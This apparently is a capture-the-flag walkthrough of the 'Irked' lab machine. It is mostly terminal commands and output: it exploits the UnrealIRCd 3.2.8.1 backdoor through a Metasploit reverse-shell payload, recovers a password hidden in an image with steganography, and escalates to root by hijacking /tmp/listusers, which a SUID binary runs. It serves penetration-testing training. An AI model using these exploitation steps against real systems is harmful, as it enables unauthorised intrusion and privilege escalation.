$ nmap -A -T4 -p- 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-15 22:50 CEST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36864/udp6 status
| 100024 1 39620/udp status
| 100024 1 44996/tcp6 status
|_ 100024 1 59146/tcp status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
59146/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.04 seconds
Access to http://10.10.10.117

According to Nmap's results, the following open ports belong to UnrealIRCd:
- 6697/tcp open irc UnrealIRCd
- 8067/tcp open irc UnrealIRCd
- 65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)
Since this box runs an IRC server, let's start by connecting to it.
$ sudo irssi 10.10.10.117 65534
Irssi v1.2.2-1+b1 - https://irssi.org
17:18 -!- Irssi: Looking up 10.10.10.117
17:18 -!- Irssi: The following settings were initialized
17:18 real_name root
17:18 user_name root
17:18 nick root
17:18 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 65534
17:18 -!- Irssi: Connection to 10.10.10.117 established
17:18 !irked.htb *** Looking up your hostname...
17:18 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
17:18 -!- You have not registered
17:18 -!- Welcome to the ROXnet IRC Network root!root@10.10.14.25
17:18 -!- Your host is irked.htb, running version Unreal3.2.8.1
17:18 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
17:18 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
17:18 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307
MAXTARGETS=20 are supported by this server
17:18 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet
CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
17:18 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
17:18 -!- There are 1 users and 0 invisible on 1 servers
17:18 -!- I have 1 clients and 0 servers
17:18 -!- Current Local Users: 1 Max: 2
17:18 -!- Current Global Users: 1 Max: 2
17:18 -!- MOTD File is missing
17:18 -!- Mode change [+iwx] for user root
According to this banner, the server runs UnrealIRCd version 3.2.8.1.
$ searchsploit unrealirc
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Exploiting UnrealIRCd
According to https://www.exploit-db.com/exploits/16922:
UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075
We can use a Metasploit module directly.
msf5 > search unrealirc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
msf5 > use 0
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 65534
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/bind_perl manual No Unix Command Shell, Bind TCP (via Perl)
1 cmd/unix/bind_perl_ipv6 manual No Unix Command Shell, Bind TCP (via perl) IPv6
2 cmd/unix/bind_ruby manual No Unix Command Shell, Bind TCP (via Ruby)
3 cmd/unix/bind_ruby_ipv6 manual No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 cmd/unix/generic manual No Unix Command, Generic Command Execution
5 cmd/unix/reverse manual No Unix Command Shell, Double Reverse TCP (telnet)
6 cmd/unix/reverse_bash_telnet_ssl manual No Unix Command Shell, Reverse TCP SSL (telnet)
7 cmd/unix/reverse_perl manual No Unix Command Shell, Reverse TCP (via Perl)
8 cmd/unix/reverse_perl_ssl manual No Unix Command Shell, Reverse TCP SSL (via perl)
9 cmd/unix/reverse_ruby manual No Unix Command Shell, Reverse TCP (via Ruby)
10 cmd/unix/reverse_ruby_ssl manual No Unix Command Shell, Reverse TCP SSL (via Ruby)
11 cmd/unix/reverse_ssl_double_telnet manual No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > use 5
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.117 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 65534 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[-] 10.10.10.117:65534 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.117 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 65534 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.25
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.117 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 65534 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.25 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.10.14.25:4444
[*] 10.10.10.117:65534 - Connected to 10.10.10.117:65534...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:65534 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo nRUzxoihQNyXr1sC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "nRUzxoihQNyXr1sC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.117:52954) at
whoami
ircd
python3 -c "import pty;pty.spawn('/bin/bash')"
ircd@irked:~$
ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
This comment points to steganography. In steganography, messages are usually hidden inside images.
How many images have we seen so far?
Only the one served at http://10.10.10.117.
Download this image to our local machine.
$ ls
irked.jpg linpeas.sh results
$ steghide extract -sf irked.jpg
Anotar salvoconducto:
anoté los datos extraídos en "pass.txt".
Use the password found in the .backup file.
$ cat pass.txt
Kab6h+m+bbp2J:HG
ircd@irked:/home$ su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:/home$ ls
djmardov ircd
djmardov@irked:/home$ cd djmardov
djmardov@irked:~$ cd Documents
djmardov@irked:~/Documents$ cat user.txt
4a66XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Based on the LinPEAS results, this is the list of SUID files:
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-sr-x 1 root root 9.3K Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 95K Aug 13 2014 /sbin/mount.nfs
-rwsr-sr-x 1 daemon daemon 50K Sep 30 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 14K Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 26K Mar 29 2015 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 34K Mar 29 2015 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-- 1 root dip 332K Apr 14 2015 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 34K Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 14K Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 18K Sep 8 2016 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-- 1 root messagebus 355K Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 158K Jan 28 2017 /bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 9.3K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 52K May 17 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 77K May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 43K May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 52K May 17 2017 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 38K May 17 2017 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 38K May 17 2017 /bin/su
-rwsr-sr-x 1 root mail 94K Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 550K Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 1.1M Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 7.2K May 16 2018 /usr/bin/viewuser
/usr/bin/viewuser is not part of a default Linux installation, so it is our first candidate to analyze.
djmardov@irked:/usr/bin$ ls -la viewuser
-rwsr-xr-x 1 root root 7328 May 16 2018 viewuser
djmardov@irked:/usr/bin$ file viewuser
viewuser: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=69ba4bc75bf72037f1ec492bc4cde2550eeac4bb, not stripped
djmardov@irked:/usr/bin$ ./viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-10-15 16:45 (:0)
sh: 1: /tmp/listusers: not found
$ scp djmardov@10.10.10.117:/usr/bin/viewuser viewuser
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ECDSA) to the list of known hosts.
djmardov@10.10.10.117's password:
viewuser
$ r2 viewuser
[0x00000440]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Finding function preludes
[x] Enable constraint types analysis for variables
[0x00000440]> afl
0x00000440 1 49 entry0
0x00000472 1 4 fcn.00000472
0x00000410 1 6 sym.imp.__libc_start_main
0x00000490 4 58 -> 53 sym.deregister_tm_clones
0x00000579 1 4 sym.__x86.get_pc_thunk.dx
0x000004d0 4 71 sym.register_tm_clones
0x00000520 5 71 entry.fini0
0x00000480 1 4 sym.__x86.get_pc_thunk.bx
0x00000570 1 9 entry.init0
0x00000660 1 2 sym.__libc_csu_fini
0x00000664 1 20 sym._fini
0x00000600 4 93 sym.__libc_csu_init
0x0000057d 1 126 main
0x000003f0 1 6 sym.imp.puts
0x00000400 1 6 sym.imp.system
0x00000420 1 6 sym.imp.setuid
0x000003bc 3 35 sym._init
0x00000000 2 32 loc.imp._ITM_deregisterTMCloneTable
[0x00000440]> pdf @main
┌ 126: int main (int32_t arg_4h);
│ ; var int32_t var_8h @ ebp-0x8
│ ; arg int32_t arg_4h @ esp+0x24
│ 0x0000057d 8d4c2404 lea ecx, dword [arg_4h]
│ 0x00000581 83e4f0 and esp, 0xfffffff0
│ 0x00000584 ff71fc push dword [ecx - 4]
│ 0x00000587 55 push ebp
│ 0x00000588 89e5 mov ebp, esp
│ 0x0000058a 53 push ebx
│ 0x0000058b 51 push ecx
│ 0x0000058c e8effeffff call sym.__x86.get_pc_thunk.bx
│ 0x00000591 81c36f1a0000 add ebx, 0x1a6f
│ 0x00000597 83ec0c sub esp, 0xc
│ 0x0000059a 8d8380e6ffff lea eax, dword [ebx - 0x1980]
│ 0x000005a0 50 push eax ; const char *s
│ 0x000005a1 e84afeffff call sym.imp.puts ; int puts(const char *s)
│ 0x000005a6 83c410 add esp, 0x10
│ 0x000005a9 83ec0c sub esp, 0xc
│ 0x000005ac 8d83c8e6ffff lea eax, dword [ebx - 0x1938]
│ 0x000005b2 50 push eax ; const char *s
│ 0x000005b3 e838feffff call sym.imp.puts ; int puts(const char *s)
│ 0x000005b8 83c410 add esp, 0x10
│ 0x000005bb 83ec0c sub esp, 0xc
│ 0x000005be 8d83ede6ffff lea eax, dword [ebx - 0x1913]
│ 0x000005c4 50 push eax ; const char *string
│ 0x000005c5 e836feffff call sym.imp.system ; int system(const char *string)
│ 0x000005ca 83c410 add esp, 0x10
│ 0x000005cd 83ec0c sub esp, 0xc
│ 0x000005d0 6a00 push 0
│ 0x000005d2 e849feffff call sym.imp.setuid
│ 0x000005d7 83c410 add esp, 0x10
│ 0x000005da 83ec0c sub esp, 0xc
│ 0x000005dd 8d83f1e6ffff lea eax, dword [ebx - 0x190f]
│ 0x000005e3 50 push eax ; const char *string
│ 0x000005e4 e817feffff call sym.imp.system ; int system(const char *string)
│ 0x000005e9 83c410 add esp, 0x10
│ 0x000005ec b800000000 mov eax, 0
│ 0x000005f1 8d65f8 lea esp, dword [var_8h]
│ 0x000005f4 59 pop ecx
│ 0x000005f5 5b pop ebx
│ 0x000005f6 5d pop ebp
│ 0x000005f7 8d61fc lea esp, dword [ecx - 4]
└ 0x000005fa c3 ret
According to this disassembly, the application calls setuid() and then calls system() with the hardcoded path /tmp/listusers.
Since /tmp is world-writable, this can be exploited by creating /tmp/listusers with malicious code, which is executed as root when the viewuser binary is run.
djmardov@irked:/tmp$ echo "/bin/sh" > listusers
echo "/bin/sh" > listusers
djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ ./viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-10-15 16:45 (:0)
sh: 1: /tmp/listusers: Permission denied
djmardov@irked:/usr/bin$ cd /tmp
djmardov@irked:/tmp$ chmod 777 listusers
djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ ./viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-10-15 16:45 (:0)
#
#whoami
root
#cd /root
#ls
pass.txt root.txt
#cat pass.txt
Kab6h+m+bbp2J:HG
#cat root.txt
8d8eXXXXXXXXXXXXXXXXXXXXXXXXXXXX